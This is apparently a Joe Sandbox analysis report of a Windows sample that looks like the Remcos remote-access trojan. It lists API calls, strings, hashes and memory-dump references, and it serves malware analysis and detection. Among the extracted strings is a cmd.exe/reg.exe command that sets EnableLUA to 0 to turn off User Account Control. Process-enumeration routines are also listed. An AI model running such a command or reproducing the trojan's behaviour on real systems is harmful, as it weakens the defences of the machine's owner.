                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ClassCreateErrorLastRegisterWindow
                                                                    • String ID: 0$MsgWindowClass
                                                                    • API String ID: 2877667751-2410386613
                                                                    • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                    • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                                                    • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                                                    • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
                                                                    • CloseHandle.KERNEL32(?), ref: 004077AA
                                                                    • CloseHandle.KERNEL32(?), ref: 004077AF
                                                                    Strings
                                                                    • C:\Windows\System32\cmd.exe, xrefs: 00407796
                                                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 00407791
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$CreateProcess
                                                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                    • API String ID: 2922976086-4183131282
                                                                    • Opcode ID: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                    • Instruction ID: bcd6b2dc2297655d1c2a6c7a9d844aadd79638dc8707381bf3a952a3ff6736b4
                                                                    • Opcode Fuzzy Hash: 86afbde76f2a9426f4ed7e8e7c7881cd7a3c7ba11745d0fd7a0dc136aa7099f4
                                                                    • Instruction Fuzzy Hash: BCF03676D4029D76CB20ABD6DC0EEDF7F7DEBC5B11F00056AF904A6141E6746404C6B9
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 0044335A
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,004432EB,?,?,0044328B,?), ref: 00443390
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                    • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                                                    • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                                                    • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000), ref: 10004B59
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10004B6C
                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,10004AEA,?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082), ref: 10004B8F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                    • Instruction ID: e6e2f78cdd7cd30bdf2d4d174718ae12991e9b6ae5ca6a82eaba56a43cf4d13d
                                                                    • Opcode Fuzzy Hash: 497ca4813dea5db040ed96ba3988917c23aad912c76c67efd82f8c60daebc881
                                                                    • Instruction Fuzzy Hash: C8F03C71900218BBEB11AB94CC48BAEBFB9EF043D1F01416AE909A6164DF309941CAA5
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                                                    • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                                                    • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                    • String ID: KeepAlive | Disabled
                                                                    • API String ID: 2993684571-305739064
                                                                    • Opcode ID: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                                                    • Instruction ID: c1447ea2195e795a2fa4d382ed9a15925dec3dc8ccf256ab7d783030aa8980db
                                                                    • Opcode Fuzzy Hash: 17bfdc88350a56738500cb661d506395563dca3eea58109498aa24bd4a02de42
                                                                    • Instruction Fuzzy Hash: 4CF06271904711BBDB103B758D0A66B7A54AB02311F0009BEF982916E2D6798840CF9A
                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CDED), ref: 0041CD62
                                                                    • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD6F
                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CDED), ref: 0041CD7C
                                                                    • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CDED), ref: 0041CD8F
                                                                    Strings
                                                                    • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CD82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                    • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                    • API String ID: 3024135584-2418719853
                                                                    • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                    • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                                    • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                                    • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                    • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                                    • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                                    • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                                    APIs
                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                    • _free.LIBCMT ref: 00444E06
                                                                    • _free.LIBCMT ref: 00444E1D
                                                                    • _free.LIBCMT ref: 00444E3C
                                                                    • _free.LIBCMT ref: 00444E57
                                                                    • _free.LIBCMT ref: 00444E6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$AllocateHeap
                                                                    • String ID:
                                                                    • API String ID: 3033488037-0
                                                                    • Opcode ID: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                                    • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                                    • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                                                    • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                                    APIs
                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                    • _free.LIBCMT ref: 004493BD
                                                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                    • _free.LIBCMT ref: 00449589
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                    • String ID:
                                                                    • API String ID: 1286116820-0
                                                                    • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                    • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                                    • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                                    • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                                    APIs
                                                                      • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                                      • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                                      • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,0%s), ref: 0041BFFA
                                                                      • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,0%s), ref: 0041C005
                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                                      • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 2180151492-0
                                                                    • Opcode ID: 594b18e292fbe012f713d1ec195552b3ac08d34b76e9b2fb29d078ab5d66342d
                                                                    • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                                    • Opcode Fuzzy Hash: 594b18e292fbe012f713d1ec195552b3ac08d34b76e9b2fb29d078ab5d66342d
                                                                    • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                    • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                                    • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                                    • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                                    • __alloca_probe_16.LIBCMT ref: 004511B1
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                                    • __freea.LIBCMT ref: 0045121D
                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                    • String ID:
                                                                    • API String ID: 313313983-0
                                                                    • Opcode ID: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                                                                    • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                                    • Opcode Fuzzy Hash: 96f15bfe140a09faeb809ebc5c29b58b41f03d59f1561ac9dee06a5207780793
                                                                    • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                                    • _free.LIBCMT ref: 0044F3BF
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4544606349.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4545729866.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                                    • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                                    • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                                                    • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                                    APIs
                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                      • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                    • _free.LIBCMT ref: 100071B8
                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4556473599.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4556389059.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4556473599.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                    • String ID:
                                                                    • API String ID: 336800556-0
                                                                    • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                    • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                    • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                    • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                    APIs
                                                                    • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                                    • _free.LIBCMT ref: 004482D3
                                                                    • _free.LIBCMT ref: 004482FA
                                                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                                    • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4543550370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4543530595.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4543603879.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
